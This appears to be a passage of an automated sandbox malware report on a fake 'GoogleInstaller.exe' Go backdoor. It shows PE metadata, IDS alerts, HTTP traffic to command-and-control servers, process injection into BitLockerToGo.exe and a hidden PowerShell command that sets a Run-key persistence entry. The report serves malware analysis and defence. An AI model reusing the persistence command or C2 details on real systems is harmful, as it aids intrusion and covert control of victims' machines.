                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x3e94780x3e9600cf3f12f8a6fde7b45888218e996c7218unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x3eb0000xbaff800xbb000022a0b1e92c3de39a46fc2d9cdfda3721unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xf9b0000x8e1400x45400d444747b8a1ede6b9ced3e071ae6ceefFalse0.4357478282942238data5.602813249646608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata0x102a0000x45e0x600f306a5893c50804fc27968861c232cfeFalse0.3639322916666667data4.0811011986954515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .reloc0x102b0000x30eb20x3100094d97ec55f10298fcd6910189a20b5aaFalse0.5761569276147959data6.64576400249757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  .symtab0x105c0000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x105d0000x29c220x29e00a9650a5e6e159ef15fb5003259efdae5False0.05824976679104477data1.2209019422388219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x105d3380x10dfPNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced0.6135679555452651
                                                  RT_ICON0x105e4180x751PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.7533368926855313
                                                  RT_ICON0x105eb6c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.014624985212350644
                                                  RT_ICON0x106f3940x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.02230922850536052
                                                  RT_ICON0x107883c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.033179297597042516
                                                  RT_ICON0x107dcc40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.022201228153046763
                                                  RT_ICON0x1081eec0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.04865145228215768
                                                  RT_ICON0x10844940x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.058395872420262666
                                                  RT_ICON0x108553c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.13688524590163934
                                                  RT_ICON0x1085ec40x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.1595744680851064
                                                  RT_GROUP_ICON0x108632c0x92data0.7054794520547946
                                                  RT_VERSION0x10863c00x490dataEnglishUnited States0.4323630136986301
                                                  RT_MANIFEST0x10868500x3d2XML 1.0 document, ASCII text, with very long lines (864)EnglishUnited States0.5398773006134969

                                                  Imports

                                                  DLLImport
                                                  kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-10-02T15:14:10.993284+02002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2194.103.90.922993192.168.2.654994TCP
                                                  2024-10-02T15:14:10.993489+02002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.65499494.103.90.922993TCP
                                                  2024-10-02T15:14:40.440237+02002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.65499494.103.90.922993TCP
                                                  2024-10-02T15:14:40.662521+02002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1194.103.90.922993192.168.2.654994TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 2, 2024 15:14:08.438694000 CEST5499180192.168.2.646.8.232.106
                                                  Oct 2, 2024 15:14:08.443566084 CEST805499146.8.232.106192.168.2.6
                                                  Oct 2, 2024 15:14:08.443733931 CEST5499180192.168.2.646.8.232.106
                                                  Oct 2, 2024 15:14:08.444242001 CEST5499180192.168.2.646.8.232.106
                                                  Oct 2, 2024 15:14:08.449125051 CEST805499146.8.232.106192.168.2.6
                                                  Oct 2, 2024 15:14:09.110162973 CEST805499146.8.232.106192.168.2.6
                                                  Oct 2, 2024 15:14:09.112505913 CEST5499280192.168.2.646.8.236.61
                                                  Oct 2, 2024 15:14:09.117337942 CEST805499246.8.236.61192.168.2.6
                                                  Oct 2, 2024 15:14:09.117424965 CEST5499280192.168.2.646.8.236.61
                                                  Oct 2, 2024 15:14:09.118948936 CEST5499280192.168.2.646.8.236.61
                                                  Oct 2, 2024 15:14:09.123765945 CEST805499246.8.236.61192.168.2.6
                                                  Oct 2, 2024 15:14:09.150819063 CEST5499180192.168.2.646.8.232.106
                                                  Oct 2, 2024 15:14:10.065938950 CEST805499246.8.236.61192.168.2.6
                                                  Oct 2, 2024 15:14:10.109041929 CEST5499280192.168.2.646.8.236.61
                                                  Oct 2, 2024 15:14:10.363579035 CEST5499180192.168.2.646.8.232.106
                                                  Oct 2, 2024 15:14:10.363953114 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:14:10.368912935 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:14:10.369035006 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:14:10.369359970 CEST805499146.8.232.106192.168.2.6
                                                  Oct 2, 2024 15:14:10.369414091 CEST5499180192.168.2.646.8.232.106
                                                  Oct 2, 2024 15:14:10.993283987 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:14:10.993489027 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:14:10.999051094 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:14:26.009804964 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:14:26.014601946 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:14:30.985721111 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:14:30.986329079 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:14:30.991549015 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:14:40.080559015 CEST5499280192.168.2.646.8.236.61
                                                  Oct 2, 2024 15:14:40.085519075 CEST805499246.8.236.61192.168.2.6
                                                  Oct 2, 2024 15:14:40.440237045 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:14:40.445069075 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:14:40.662520885 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:14:40.710314035 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:14:51.264542103 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:14:51.267431021 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:14:51.272360086 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:06.281028032 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:15:06.285945892 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:10.093497038 CEST5499280192.168.2.646.8.236.61
                                                  Oct 2, 2024 15:15:10.521590948 CEST805499246.8.236.61192.168.2.6
                                                  Oct 2, 2024 15:15:10.671895981 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:15:10.677670002 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:10.893595934 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:10.941364050 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:15:11.507594109 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:11.507802010 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:15:11.512650967 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:26.524679899 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:15:26.530034065 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:31.728423119 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:31.729779005 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:15:31.734796047 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:40.074933052 CEST5499280192.168.2.646.8.236.61
                                                  Oct 2, 2024 15:15:40.080216885 CEST805499246.8.236.61192.168.2.6
                                                  Oct 2, 2024 15:15:40.080324888 CEST5499280192.168.2.646.8.236.61
                                                  Oct 2, 2024 15:15:40.903947115 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:15:40.908873081 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:41.123218060 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:41.174309015 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:15:51.948328972 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:15:51.948796034 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:15:51.953700066 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:16:06.965131998 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:16:06.970170021 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:16:11.137132883 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:16:11.142066002 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:16:11.359841108 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:16:11.403307915 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:16:12.171749115 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:16:12.172252893 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:16:12.177171946 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:16:27.189126968 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:16:27.194205999 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:16:32.392792940 CEST229935499494.103.90.9192.168.2.6
                                                  Oct 2, 2024 15:16:32.397372961 CEST5499422993192.168.2.694.103.90.9
                                                  Oct 2, 2024 15:16:32.402287006 CEST229935499494.103.90.9192.168.2.6

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 2, 2024 15:14:05.067522049 CEST5359072162.159.36.2192.168.2.6
                                                  Oct 2, 2024 15:14:05.530723095 CEST4956453192.168.2.61.1.1.1
                                                  Oct 2, 2024 15:14:05.538062096 CEST53495641.1.1.1192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 2, 2024 15:14:05.530723095 CEST192.168.2.61.1.1.10x8b0bStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 2, 2024 15:14:05.538062096 CEST1.1.1.1192.168.2.60x8b0bName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • 46.8.232.106
                                                  • 46.8.236.61

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.65499146.8.232.106806512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 2, 2024 15:14:08.444242001 CEST298OUTPOST / HTTP/1.1
                                                  Host: 46.8.232.106
                                                  User-Agent: Go-http-client/1.1
                                                  Content-Length: 162
                                                  X-Api-Key: tbNgF6Ul
                                                  Accept-Encoding: gzip
                                                  Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 33 0b 17 54 0c 11 2d 2c 2f 54 3b 08 02 1a 1a 31 5c 00 31 5f 58 3f 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 1b 2a 03 11 51 03 17 2e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 16 1d 54 0a 17 58 28 3f 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 04 59 01 48 50 25 01 5c 24 0a 59 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                                  Data Ascii: M*L\K3T-,/T;1\1_X?!EOM:DSE*Q.LJK9AULTX(?EOM9L\KWYHP%\$YEOM\EYMP]SSV^X[RYQZYR^K
                                                  Oct 2, 2024 15:14:09.110162973 CEST183INHTTP/1.1 429 Too Many Requests
                                                  Content-Type: text/plain; charset=utf-8
                                                  X-Content-Type-Options: nosniff
                                                  Date: Wed, 02 Oct 2024 13:14:09 GMT
                                                  Content-Length: 18
                                                  Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                  Data Ascii: Too many requests


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.65499246.8.236.61806512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 2, 2024 15:14:09.118948936 CEST297OUTPOST / HTTP/1.1
                                                  Host: 46.8.236.61
                                                  User-Agent: Go-http-client/1.1
                                                  Content-Length: 162
                                                  X-Api-Key: rvHBX3VV
                                                  Accept-Encoding: gzip
                                                  Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 33 0b 17 54 0c 11 2d 2c 2f 54 3b 08 02 1a 1a 31 5c 00 31 5f 58 3f 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 1b 2a 03 11 51 03 17 2e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 16 1d 54 0a 17 58 28 3f 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 04 59 01 48 50 25 01 5c 24 0a 59 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                                  Data Ascii: M*L\K3T-,/T;1\1_X?!EOM:DSE*Q.LJK9AULTX(?EOM9L\KWYHP%\$YEOM\EYMP]SSV^X[RYQZYR^K
                                                  Oct 2, 2024 15:14:10.065938950 CEST460INHTTP/1.1 200 OK
                                                  Date: Wed, 02 Oct 2024 13:14:09 GMT
                                                  Content-Length: 342
                                                  Content-Type: text/plain; charset=utf-8
                                                  Data Raw: 39 34 2e 31 30 33 2e 39 30 2e 39 3b 32 32 39 39 33 3b 68 70 63 77 74 79 36 53 74 72 35 57 70 61 4f 39 3a 36 4d 4d 2f 52 6b 76 2f 75 37 53 34 32 43 32 36 50 43 5a 2e 6a 47 37 38 68 74 33 2e 46 39 34 32 49 5a 44 33 73 46 64 32 4e 4a 6b 2e 37 7a 42 31 46 51 41 30 43 54 33 36 65 48 63 2c 37 71 77 68 4c 6f 63 74 77 6a 37 74 67 33 4e 70 4e 71 32 3a 62 4c 7a 2f 6b 76 38 2f 77 79 58 34 50 7a 44 36 48 44 73 2e 79 72 58 38 6f 43 79 2e 4d 66 69 32 78 30 55 33 39 31 4c 36 68 4d 6d 2e 62 32 6e 36 7a 44 52 31 6f 42 4c 2c 35 69 6f 68 71 47 4d 74 57 64 36 74 37 63 6e 70 36 64 65 3a 76 5a 33 2f 4b 42 50 2f 6b 53 48 39 46 50 4d 33 73 30 57 2e 4d 32 51 31 39 44 4a 38 67 43 31 35 69 61 43 2e 67 6b 72 31 47 49 7a 35 41 41 34 39 55 6f 64 2e 6e 35 62 32 41 43 53 35 32 36 41 33 66 78 6c 2c 53 44 32 68 61 76 38 74 72 78 67 74 74 53 50 70 69 77 7a 3a 34 52 6b 2f 6e 47 35 2f 34 48 4c 39 73 37 55 31 4d 63 6b 2e 6b 52 33 32 77 45 4c 31 62 51 6e 32 45 32 59 2e 75 54 47 31 47 62 47 36 79 68 78 36 34 37 4e 2e 78 51 38 39 59 70 4d [TRUNCATED]
                                                  Data Ascii: 94.103.90.9;22993;hpcwty6Str5WpaO9:6MM/Rkv/u7S42C26PCZ.jG78ht3.F942IZD3sFd2NJk.7zB1FQA0CT36eHc,7qwhLoctwj7tg3NpNq2:bLz/kv8/wyX4PzD6HDs.yrX8oCy.Mfi2x0U391L6hMm.b2n6zDR1oBL,5iohqGMtWd6t7cnp6de:vZ3/KBP/kSH9FPM3s0W.M2Q19DJ8gC15iaC.gkr1GIz5AA49Uod.n5b2ACS526A3fxl,SD2hav8trxgttSPpiwz:4Rk/nG5/4HL9s7U1Mck.kR32wEL1bQn2E2Y.uTG1GbG6yhx647N.xQ89YpM1Ds4
                                                  Oct 2, 2024 15:14:40.080559015 CEST6OUTData Raw: 00
                                                  Data Ascii:
                                                  Oct 2, 2024 15:15:10.093497038 CEST6OUTData Raw: 00
                                                  Data Ascii:


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:09:13:34
                                                  Start date:02/10/2024
                                                  Path:C:\Users\user\Desktop\GoogleInstaller.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\GoogleInstaller.exe"
                                                  Imagebase:0xe80000
                                                  File size:17'015'808 bytes
                                                  MD5 hash:3D429D9F74DA7B1F95EA8DB8A486ED20
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2377337169.0000000003D7E000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2377337169.0000000006348000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2377337169.0000000005364000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:09:13:47
                                                  Start date:02/10/2024
                                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                  Imagebase:0xa40000
                                                  File size:231'736 bytes
                                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  General

                                                  Target ID:6
                                                  Start time:09:13:54
                                                  Start date:02/10/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
                                                  Imagebase:0x310000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:09:13:54
                                                  Start date:02/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:09:14:06
                                                  Start date:02/10/2024
                                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                  Imagebase:0xa40000
                                                  File size:231'736 bytes
                                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Non-executed Functions

                                                    Function 00EBB560 Relevance: 11.4, Strings: 9, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me, xrefs: 00EBB884
                                                    • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Method index out of rangereflect: ChanDir of no, xrefs: 00EBB802
                                                    • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125 has no name has no typereflect., xrefs: 00EBB7A7
                                                    • %, xrefs: 00EBB8C1
                                                    • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexbufio.Scanner: Read returned imposs, xrefs: 00EBB829
                                                    • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: Bits of non-arithmetic Type r, xrefs: 00EBB8B8
                                                    • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 00EBB7CE
                                                    • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w, xrefs: 00EBB85D
                                                    • ) @s -> Pn=][}]i)> +; )(25[] %-%q])<<>>==!=||&&>=<==~!~in**OUCNST=#", xrefs: 00EBB78C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2362349072.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                    • Associated: 00000000.00000002.2362328310.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2366017861.000000000126B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2366017861.0000000001C6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2370792632.0000000001E1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2370875655.0000000001E1E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2370900392.0000000001E1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2370924983.0000000001E20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2370941642.0000000001E22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2370961178.0000000001E23000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371039686.0000000001E51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371067528.0000000001E5C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371089564.0000000001E5D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371089564.0000000001E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371089564.0000000001EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371089564.0000000001EA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371187612.0000000001EAA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371208611.0000000001EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371208611.0000000001EDD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371208611.0000000001EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2371208611.0000000001F01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e80000_GoogleInstaller.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %$) @s -> Pn=][}]i)> +; )(25[] %-%q])<<>>==!=||&&>=<==~!~in**OUCNST=#"$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Method index out of rangereflect: ChanDir of no$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125 has no name has no typereflect.$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: Bits of non-arithmetic Type r$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexbufio.Scanner: Read returned imposs$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
                                                    • API String ID: 0-2354880154
                                                    • Opcode ID: 065ecb4b180e211b3ceea264c5a73f058e4292878738e6a6200ba46858f92a94
                                                    • Instruction ID: 63d579232aa6ce3cb89996f6b11551132d4cb2c6a428bf3a6502e8b37ac76475
                                                    • Opcode Fuzzy Hash: 065ecb4b180e211b3ceea264c5a73f058e4292878738e6a6200ba46858f92a94
